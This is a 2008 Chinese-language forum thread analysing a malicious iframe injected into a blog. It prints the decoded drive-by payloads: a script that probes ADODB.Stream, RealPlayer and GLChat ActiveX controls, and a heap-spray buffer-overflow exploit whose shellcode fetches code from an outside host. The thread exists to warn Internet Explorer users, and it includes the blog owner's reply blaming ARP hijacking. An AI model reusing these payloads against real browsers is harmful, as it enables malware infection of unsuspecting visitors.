之前有看過proll在Blog上說某個插件被植入木馬,後來有移除掉,不過今天用Google收尋後發現被列為惡意網站了 !

沒圖沒真相:

LINKSCANNER 說



There was 1 threat found.

	QUESTIONABLE: LinkScanner Online has found [Invisible IFrame launcher]
Detail:	Exploit: Invisible IFrame Launcher
	This script is used by malicious iframers to launch exploits.
Scanned:	Saturday, March 08, 2008
Our Advice:	This page contains at least one exploit. You should not click on this link without appropriate anti-exploit protection on your PC.

引用:

原帖由 andy 於 2008-3-8 15:15 發表
LINKSCANNER 說



There was 1 threat found.
QUESTIONAB ...

引用:

Detail:Exploit: Invisible IFrame Launcher
This script is used by malicious iframers to launch exploits.

Scanned:Saturday, March 08, 2008

LinkScanner應該是報這個吧:

引用:

<iframe src=http://vvv.123sky.biz/101/ width=100 height=0></iframe>

果然,LinkScanner掃描上面那個網站後就發現有問題,可參考:http://linkscanner.explabs.com/l ... vvv.123sky.biz/101/

[ 本帖最後由 integear 於 2008-3-8 15:43 編輯 ]

繼續分析 .

其中有"1.htm","r.htm","14.htm",已經附加在附件裡了 .

LinkScanner掃描後發現"1.htm"有利用漏洞攻擊的情況,其他兩個都認為是"安全" !

"1.htm"LinkScanner掃描結果,可參考:http://linkscanner.explabs.com/l ... 23sky.biz/101/1.htm

"14.htm"LinkScanner掃描結果,可參考:http://linkscanner.explabs.com/l ... 3sky.biz/101/14.htm

"r.htm"LinkScanner掃描結果,可參考:http://linkscanner.explabs.com/l ... 23sky.biz/101/r.htm

"1.htm"解密後:

引用:

<script language="javaScript">
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('Lovemzzdsx')==-1){
var ids="clsid:BD96C556-65";
var idss="A3-11D0-983";
var idsss="A-00C04FC29E36";
var idx=ids+idss+idsss;
try{
var e;
var ado=(document["createElement"]("object"));
ado["setAttribute"]("classid",idx);
var as=window["ado"]["createobject"]("A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+3*60*60*1000);
document.cookie='Lovemzzdsx=fuckyoukasperskys;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<iframe width='0' height='0' src='14.htm'></iframe>")}
else{
try{var r;var reals=new window["ActiveXObject"]("IERPCtl.IERPCtl.1}
catch(r){};
finally{if(r!="[object Error]"){
document.write("<iframe width='0' height='0' src='r.htm'></iframe>")}}
try{var j;var lianzhong=new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1}
catch(j){};
finally{if(j!="[object Error]"){
document.write("<iframe width='0' height='0' src='lz.htm'></iframe>")}
if(r=="[object Error]"&&j=="[object Error]"){
document.write("about:blank")}}
}}}
</script>

得到"lz.htm",之後解密:

引用:

<script>
<html>
<object classid="clsid:61F5C358-60FB-4A23-A312-D2B556620F20" id="target"></object>
<body>
<SCRIPT language="javascript">
var shellcode = unescape("%u9090"+"%u9090"+
         "%u9090%u6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9"+
         "%u0004%uf300%uffa4%ue8e0%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c"+
         "%u1c70%u8bad%u0870%uec81%u0200%u0000%uec8b%ue8bb%u020f%u8b00%u8503"+
         "%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d%u6856%ufe98"+
         "%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e%uec0e%ua3e8%u0000%u8900"+
         "%u0445%u6856%u79c1%ub8e5%u95e8%u0000%u8900%u1c45%u6856%uc61b%u7946"+
         "%u87e8%u0000%u8900%u1045%u6856%ufcaa%u7c0d%u79e8%u0000%u8900%u0845"+
         "%u6856%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%u8900%u3303"+
         "%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00%u285d%uff53%u0455"+
         "%u6850%u1a36%u702f%u3fe8%u0000%u8900%u2445%u7f6a%u5d8d%u5328%u55ff"+
         "%uc71c%u0544%u5c28%u652e%uc778%u0544%u652c%u0000%u5600%u8d56%u287d"+
         "%uff57%u2075%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%uc481%u0200"+
         "%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b%u560c%u738b"+
         "%u8b3c%u1e74%u0378%u56f3%u768b%u0320%u33f3%u49c9%uad41%uc303%u3356"+
         "%u0ff6%u10be%uf23a%u0874%ucec1%u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5"+
         "%ueb8b%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5ec5"+
         "%u595b%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100%u0000"+
         "%ua4f3%uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07%u6474%uc76c%u0447"+
         "%u006c%u0000%uff57%u0455%u4589%uc724%u5207%u6c74%uc741%u0447%u6c6c"+
         "%u636f%u47c7%u6108%u6574%uc748%u0c47%u6165%u0070%u5057%u55ff%u8b08"+
         "%ub8f0%u0fe4%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700"+
         "%u55ff%u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474%uf9e2%u12eb"+
         "%u348d%u5508%u406a%u046a%uff56%u1055%u06c7%u0c80%u0002%uc481%u0100"+
         "%u0000%ue8c3%uff69%uffff%u048b%u5324%u5251%u5756%uecb9%u020f%u8b00"+
         "%u8519%u75db%u3350%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500"+
         "%u833e%u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f%u8318"+
         "%u6afb%u2575%uc083%u8b04%ub830%u0fe0%u0002%u0068%u0000%u6801%u1000"+
         "%u0000%u006a%u10ff%u0689%u4489%u1824%uecb9%u020f%uff00%u5f01%u5a5e"+
         "%u5b59%ue4b8%u020f%uff00%ue820%ufdda%uffff"+
         "%u7468%u7074%u2f3a%u762f%u7676%u312e%u3332%u6b73%u2e79%u6962%u2f7a%u3031%u2f33%u3031%u2e33%u7865%u0065\
var bigblock = unescape("%u9090%u9090\
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block +shellcode;
var buffer = "";
while (buffer.length < 1319) buffer+="A";
buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;
target.hgs_startNotify(buffer);
</script>
</body>
</html>")
</script>

看起來是到這裡結束了,由於攻擊的是ActiveX所以沒有威脅檔案 .

強烈建議使用IE的人不要瀏覽該網站!

[ 本帖最後由 integear 於 2008-3-8 16:06 編輯 ]

希望你還是分析清楚后再發貼…………免得因為你的言論誤導大家認為是我掛馬。

托管的服務器遭受ARP劫持，我也沒辦法，因為服務器FTP中原html文檔根本未受感染，但是你訪問的時候被“劫持”了，就是這個道理。

還好服務器提供商方面當晚就修復了，掛馬時間總共持續4、5個小時。

想要逃避ARP攻擊，難！反病毒廠商的網站也偶爾被掛。

引用:

原帖由 proll 於 2008-3-15 11:28 發表
希望你還是分析清楚后再發貼…………免得因為你的言論誤導大家認為是我掛馬。

托管的服務器遭受ARP劫持，我也沒辦法，因為服務器FTP中原html文檔根本未受感染，但是你訪問的時候被“劫持”了，就是這個道理。

...

在下並無此意,不過閣下這樣理解在下十分抱歉 .

不過目前Haute Secure還是警告閣下的Blog中有"123sky.biz"這個惡意網站 !

我最近一段時間比較忙，在BLOG也很少發文，現在忙工作，經常出門去考察一些企業，所以上網時間縮短到平均每日1小時不到。。。

等有空了再來打理吧。

就算我要掛馬，也不至于利用老掉牙的iframe來掛
Haute Secure這種軟體……實在沒什么好多言之。

引用:

原帖由 proll 於 2008-3-15 16:16 發表
就算我要掛馬，也不至于利用老掉牙的iframe來掛
Haute Secure這種軟體……實在沒什么好多言之。

最近才看到Kaspersky,ESET對於IFrame大量偵測 .

……流行了2、3年漏洞，現在加入只能說是爲了“炒作”